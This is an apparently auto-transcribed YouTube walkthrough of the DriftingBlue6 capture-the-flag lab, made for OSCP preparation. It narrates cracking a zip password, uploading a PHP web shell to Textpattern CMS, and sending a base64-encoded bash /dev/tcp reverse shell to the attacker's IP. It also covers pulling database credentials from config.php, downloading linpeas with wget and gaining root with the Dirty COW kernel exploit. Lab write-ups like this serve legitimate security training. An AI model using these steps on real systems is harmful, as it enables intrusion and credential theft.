What's going on YouTube? Welcome back to another video. In today's video, we are doing DriftingBlue6 from Proving Grounds Play. This is a part of TJ Knowles' OSCP prep, and this is a pretty cool box and a pretty easy box as long as you have your enumeration on point. We do some web enumeration, some web exploitation. We get access to a CMS in which we find a vulnerability that allows us to create a file with PHP and then just get a reverse shell on the box, which then we use linpeas to find out that this is a vulnerable kernel version and get root through that method. All right, nonetheless, without further ado, let's get into it. So let's go ahead and start off with an nmap scan. Let's do sudo nmap techsc for default scripts, techsv to enumerate the versions, techv to get verbose output, and then techon to output to a file in a directory called enum, and then call it initial with this IP address. Now I already did run this because it did take a little bit of time, but we could just go ahead and take a look at it, and we only see that we have one port open. So I guess it didn't take that much time, although we have HTTP here on port 80 with running Apache. So I'm assuming that PHP is running on the back end. And we do have a robots.txt entry that says text pattern and text pattern. So that being said, let's go ahead and take a look at the website. Go here and paste in the IP, and we get this drifting blues tech. Please don't hack. Enough is enough with this image. So the first thing I want to do is I want to go ahead and check out the robots.txt, and we see here that it says disallow text pattern. So we can go ahead and copy this, and it says don't forget to add the .zip extension to your dir root. Okay, kind of weird for a company to go ahead and put that in here while saying please don't hack, but nonetheless, let's go ahead and check out what this is. Although before we do that, I want to go ahead and start a scan or a directory brute force, and let's do FUFF techu http:// and then we can go ahead and grab the IP address and throw it in there with fuzz, and right here we can do w for word list, opt sec list, discovery, web content, and we could do directory list lowercase medium, and hold on, FFUF, there you go, and we can go ahead and filter for 44 words. Let's do FW44, and we can see if we get anything from here. So we have DB and robots. Let's see what else. Before we go there, let's go ahead and check this out. This looks like a login page. And can we do any version enumeration from here? It can search for version, nothing there. Search for ID, nothing. Text. Okay, text pattern, let's see, documentation, and it doesn't look like there is any version enumeration here, or at least allowed in this source code review. So we can go ahead and exit out of that, and we can start a, or actually before we go there, let's see what's over here. Okay, so this looks like the installations. This is Textpattern CMS. All right. So we know that we have a CMS running on the web server, so we can go ahead and keep that in mind for when we do go to find an exploit for it. Although there is a spammer directory and a robots directory and a DB directory. So let's go ahead and take a look at that just to see what it is. Actually, before I do that, let me just start this in the background. Let's do another FUFF. Grab this, go ahead and copy it here. Let's start another one, except let's have it go into the text pattern directory. I believe like that. Yeah, there you go. And we'll come back to that when it's ready. Let me see if I can take this out. How many lines is this? 235. Let's go ahead and filter for 235. And Never mind. I guess that doesn't really work. What was that? Words or oh, that's why. Lines and 235. There you go. So we have a couple things there, although we can go ahead and take a look at what we got here. So we have DB. So this is just the PNG image. We have, what was it? Robots. And this just brings us to the robots.txt file. And we have spammer. Spammer. So spammer goes ahead and downloads a .zip file. So we can go ahead and grab that .zip file. Let's go ahead and bring this down a little bit. And we can do copy downloads and then spammer.zip here. So now that we have the spammer.zip in here, we can go ahead and see if we can unzip this to see what's inside, right? So let's do zip spammer.zip. And it looks like we need a password for this. So we can try admin, we can try password, and it's not really working. Although there is a tool that comes with John the Ripper that allows us to sort of put this in a hash format that John understands, and we can go ahead and crack that hash to get the password for this zip file. So let's do zip to John with this, and then spammer.zip, enter, and we get this sort of hash that John the Ripper can understand. So we can do vi for John. Go ahead and paste this in here. And we could do John with for John. And word list equals opt rocku. And immediately we get the password, MySpace 4. So let's go ahead and do unzip and paste in the password. And we extract a creds.zip. So let's go ahead and cat creds.zip. Oops. Creds.txt, not creds.zip. And we get this mayor and Lionheart. So we can go over here to the Textpattern directory or the login page. And we could try it. Let's do mayor, Lionheart. Did he do that correctly? Probably not. Go ahead and copy this. Mayor Lionheart, and we happen to get in. Awesome. So the first thing I want to do is I want to find the version of this CMS to see if it's vulnerable to any public exploits online, right? And right down here on the bottom left, you can see that we have a version number of 4.8.3. So let's go ahead and copy this. Let's do text pattern exploit. If I could spell, that'd be great. Exploit. Doesn't really matter, I guess. And so we do have an authenticated remote code execution vulnerability. If we come in here, we can go ahead and take a look at this code. And this seems to me, this seems way too complicated for really what it is. So, all right, here we go. So we have the text pattern, like original directory, and then inside we have the files folder. So what this does basically is just creates another file, simple PHP file that when you go to execute it, it literally just plain and simple executes PHP code, and there's no workaround. That's literally it. So we can go over here. We can come down here to the FUFF that we did on the original directory, and we can see that there is a files directory here within that. So we can go ahead and close that. Keep that in mind. Let's go ahead and vi shell or we can do exec.php, and then we can do a simple PHP system call. underscore request with CMD like that. And then we can go ahead and close this out with question mark and that. All right, so we can go ahead and save this. And all we have to do is come back here. And actually from here, we can do, where is it? Content. Yeah, here we go. Content. Go down here to files. And we can just simply upload this file. So it's super simple. Machines. Then we can go to DriftingBlue6 and we have exec. Upload that. And it was successfully uploaded. So now if we go over here, or I mean, we can actually just do this. Files. We get this directory indexing and we have exec.php. So if we click on this, looks like nothing happens, but we do need to pass it a parameter cmd equals id. At least I thought so. Did I mess something up? Yeah, I probably did. Let's see this. Oh, it's this thing right here. That's why. Let's go ahead and do that again. Let's go ahead and how can I delete this? Here, delete. There you go. So we can go browse, exec.php, upload. Let's go to files, exec.php. We could do question mark cmd equals id. And we do have remote code execution. Awesome. So from here, we do want to get a reverse shell, right? We do want to sort of lead this into actually getting on the box. So we can go ahead and open up burp just to make it a little more simple for us. And I'm going to go ahead and intercept that request. So we can go to proxy, intercept on, refresh this, get this here, Control R to send to repeater, Control Shift R to go to repeater. Then here we can go ahead and change the request method. And we're allowed to do this. We're allowed to change the request method because we put a $_request in the PHP code instead of a $_get. And so a request is just either get or post. So we can change this to post. We have the CMD down here. And if we send it, you can see that we get the data back. So the first thing we can do is we can go ahead and go to the decoder and we can do a simple bash reverse shell. So we could do bash tac I and then to and dev tcp 192.168.45.151 is the IP with 9999 as the port and then 0, 2, and 1 like that. And that's done. So now we can do this. We can go to encode as base64, and we have a couple special characters here that we want to kind of get rid of. So we can put an extra space here. There's another one up here, so we can come, I believe it's here, do that. Then we have two equal signs, so we could do this, and I think, yeah, we're good to go. No more special characters. It's all alphanumerics. So we can go ahead and copy this, go back to repeater, do echo, paste this in, and then base64 tac D bash like this. We can go ahead and URL encode this, go back, and we can go ahead and do a netcat or ncat nblp 9999. And we can send this. Looks like it's hanging, and we do have a reverse shell on the box. So this is super cool. That's just one of the ways to do it. I'm not sure if you could have just straight put the reverse shell in there and it would have worked. I just like to try that little base64 type thing out whenever I can, right? So what do we have on here? Let's see. Do we have Python 3? Which Python 3? We don't. Which Python? We do have user bin Python, so we can do Python -c import pty.spawn colon, and then, not colon, bin bash, like that. Control Z, stty raw minus echo colon fg semicolon. And then we can do export term equals x term, and we can clear the screen. So the first thing that I want to do, right, is I want to see, am I part of any groups? No. I want to see the actual architecture of the box. So we could do name tag A, and we have Linux 3204. I believe this version is vulnerable to a kernel exploit. If we do Linux kernel, oh, I might need to turn off burp. Might be a good idea. We'll do Linux kernel exploit. And we have dirty cow. So this is vulnerable to dirty cow. And we can go ahead and do a little bit more enumeration before we actually go and try and run this. Let's see if linpeas goes ahead and finds that also. So another thing that we can do is, let's see what services are running on here. So we could do ssnltp, and we can see that MySQL is actually running on localhost. Also, port 25, SMTP, I believe, is running on also localhost. So the first thing in this case, right, if I was first enumerating the box, I want to see if there's any credentials that I can get to this MySQL database, right? So we're in files, so let's go back. Let's go in here, I believe. Yeah, we can go in here and we can do find dot and then grep for config. So inside the text pattern directory, we have a config.php. So we can cat this. If we take out this leading slash, and right here we have a couple credentials. We have Drifter, the user. We have the password of I'm just drifting 31, and the host of localhost for the database of textpattern_db. So let's go ahead and try this out and see if we can get anything from this. So we can do MySQL, tag u, drifter, tag p, and then tag h 127.0.0.1. Enter. It's going to ask for the password. We can paste it, and we get into the MySQL server. So what we can do from here is show databases. We have textpattern.db. We can do use textpattern.db, and we can do show tables. We have this users table, so we can do select all from this. And we can see here that there's no other usernames or passwords or credentials in here that we can really utilize to get root on the box. This is Mayor, and this is the same password that we got, the Lionheart, from the credentials.txt file. So there's nothing really here. We can do a exit to get out of that, and we can go ahead and go into temp, and let's upload linpeas on here. Let's do locate linpeas.sh. We have linpeas.sh right here. Go ahead and grab this. And we can CP this here. We have it in there. Awesome. We can do Python 3 text m http server 80. And we can do, do we have curl? No. Do we have wget? Yes, we do. So we can do wget http ://192.168.451.151/linpeas.sh. Go ahead and grab that file, close out of that. We have it in here. So what we can do is just chmod +x on this, and we can run it. chmod plus x linpeas /linpeas. All right, there you go. We can see if this finds anything. The first thing that it comes up with is the OS version, of course. And let's go ahead and start from the top. It's already done. Surprisingly, that was fairly fast. Let's go ahead and come all the way up to the top. Here you go. We could just go down here. So one of the first things that it finds is the Linux version 3.2. We also see this right here, the operating system. Can go down a little bit and see if there's any other useful information. Okay, so one thing right here, executing Linux exploit suggester. So the first thing that the Linux exploit suggester suggests on this box is going to be dirty cow. So I'm not going to go anywhere else with this. I'm just going to go ahead and run dirty cow and see if we can get at least try it, right? See if we can get an easy win to be able to root the box. So let's go ahead and clear that. And let's go over here. Let's search up, we have it actually right here. I believe it's this one. Dirty cow. We can go ahead and download this. We have it right there. Let's go ahead and move downloads 40C here. And then we can move 40C to dirty.c, Python 3, TACM HTTP .server 80 wget HTTP, or actually we can just do Control R and then wget. Go ahead and change this dirty.c, and we have to compile this. So we can use GCC for this. So we can do GCC TACP threads dirty.c tac o for the output file, and we could do privesc, and then we can do, or I believe that's it. We can also do, I believe, lcrypt, or is it pthread? Oh, threads. There you go. So it is pthread. So it's GCC pthread dirty.c and then tac o for the actual file that you want to execute. If we do ls, not there. Odd. Let's see. Crypt. Okay. All right, so we can also add this lcrypt function. I didn't know if we needed this or not, although I believe, yeah, okay, so it does say that we do need it right here, this lcrypt function. So go ahead and run that lcrypt function also, and we have this privesc file. So all we got to do is /privesc has been successfully backed up. We need to enter a password for the new user that this is going to create. So we can just do password. And we do have another user created in the etc password directory. Not directory, file. And all we have to do now is go back, or actually Control C this, and su fart password and ID. We are root, just like that. So we can go ahead and do cd/root and grab the proof.txt right here. Now before we go, we have to clean up our mess. So let's go ahead and do ls on temp, and we see that we have password.back. So we can just move temp pass.back to /etc passwd, and now if we cat etc passwd, we can see that our user is no longer here. So we just went ahead and fixed that up a little bit, and just so there's no other like exploitation of the box once we're finished. And so yeah, that's the whole entire box. I hope you guys enjoyed. This was a pretty cool box, and we did learn a couple new things with the whole dirty cow exploit and kernel exploits with Linux. So if you guys did enjoy, if you learned something, if you thought it was cool, let me know in the comments, and also go ahead and let me know what other boxes that you guys want to do. But yeah, with that being said, thank you guys for watching, and I'll see you all in the next one.